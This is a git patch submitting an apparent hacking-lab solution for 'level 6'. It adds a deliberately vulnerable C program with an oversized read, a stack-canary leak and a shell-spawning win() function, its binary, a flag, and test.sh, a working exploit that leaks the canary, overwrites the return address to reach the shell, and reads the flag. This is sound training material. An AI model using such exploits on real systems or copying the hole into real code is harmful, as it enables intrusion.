From 4c3e281ef5ee82c60172d97c37ab454057490a7d Mon Sep 17 00:00:00 2001
From: Eggert Jung <eggert.s.jung@wischhof13.de>
Date: Tue, 6 Jan 2026 15:54:17 +0100
Subject: [PATCH] solved 6

---
 4/level6/flag.txt |   1 +
 4/level6/level6   | Bin 0 -> 17008 bytes
 4/level6/level6.c |  27 +++++++++++++++++++++++++++
 4/level6/test.sh  |  34 ++++++++++++++++++++++++++++++++++
 4 files changed, 62 insertions(+)
 create mode 100644 4/level6/flag.txt
 create mode 100755 4/level6/level6
 create mode 100644 4/level6/level6.c
 create mode 100755 4/level6/test.sh

diff --git a/4/level6/flag.txt b/4/level6/flag.txt
new file mode 100644
index 0000000..edd5b55
--- /dev/null
+++ b/4/level6/flag.txt
@@ -0,0 +1 @@
+hacklab{thanks_mario_but_the_flag_is_on_another_server}
diff --git a/4/level6/level6 b/4/level6/level6
new file mode 100755
index 0000000000000000000000000000000000000000..35db28d83bdfe00abfc17ba59ab260ed537ac80d
GIT binary patch
literal 17008
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
E4>EQ%0{{R3

literal 0
HcmV?d00001

diff --git a/4/level6/level6.c b/4/level6/level6.c
new file mode 100644
index 0000000..db1d711
--- /dev/null
+++ b/4/level6/level6.c
@@ -0,0 +1,27 @@
+// gcc -o level6 -no-pie -fstack-protector level6.c
+#include <stdio.h>
+#include <unistd.h>
+
+void win(void) {
+  char *argv[2];
+  argv[0] = "/bin/sh";
+  argv[1] = NULL;
+  execve(argv[0], argv, NULL);
+}
+
+int main(int argc, char **argv) {
+  // Disable output buffering. Not part of the challenge.
+  setvbuf(stdout, NULL, _IONBF, 0);
+  setvbuf(stdin, NULL, _IONBF, 0);
+
+  char buffer[64];
+  while (1) {
+    puts("What do you want to talk about?");
+    read(0, buffer, 128);
+    if (buffer[0] == '\0' || buffer[0] == '\n') break;
+
+    printf("I can't talk about %s.\n", buffer);
+  }
+  puts("Bye.");
+  return 0;
+}
diff --git a/4/level6/test.sh b/4/level6/test.sh
new file mode 100755
index 0000000..0bb6db3
--- /dev/null
+++ b/4/level6/test.sh
@@ -0,0 +1,34 @@
+#objdump
+#00000000004011d6 g     F .text	000000000000003a              win
+
+OLDFLAG="hacklab{SSE_1n5truct10n5_n33d_spec14l_al1gnm3nt_UwT8mByQ}\n"
+PADDING="aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" #64
+SAVERBP="\x90\xde\xff\xff\xff\x7f\x00\00"  #kind of irrelevant
+GADGET1="\x84\x12\x40\00\00\00\00\00"      #ret (for stack alignment)
+GADGET2="\x83\x12\x40\00\00\00\00\00"      #pop rdi, ret
+CMDADDR="\x48\x40\x40\00\00\00\00\00"
+CMDCALL="\xd6\x11\x40\00\00\00\00\00"
+#STACKPT="\x18\xde\xff\xff\xff\x7f\00\00"
+STACKPT="\x02\00\00\00\00\00\00\00"
+
+read
+read
+printf "$OLDFLAG"
+read
+read
+
+printf "$PADDING""AAAAAAAA\n"
+read
+read
+read canary
+>&2 echo "read canary: "$(echo "$canary" | hd)
+read input
+>&2 echo $input
+
+>&2 echo "writing canary + exploit"
+printf "\00$PADDING""1234567\00${canary:0:7}$STACKPT$CMDCALL\n"
+read input
+>&2 echo "should be bye: "$input
+printf "cat flag.txt\n"
+read input
+>&2 echo "should be shell: "$input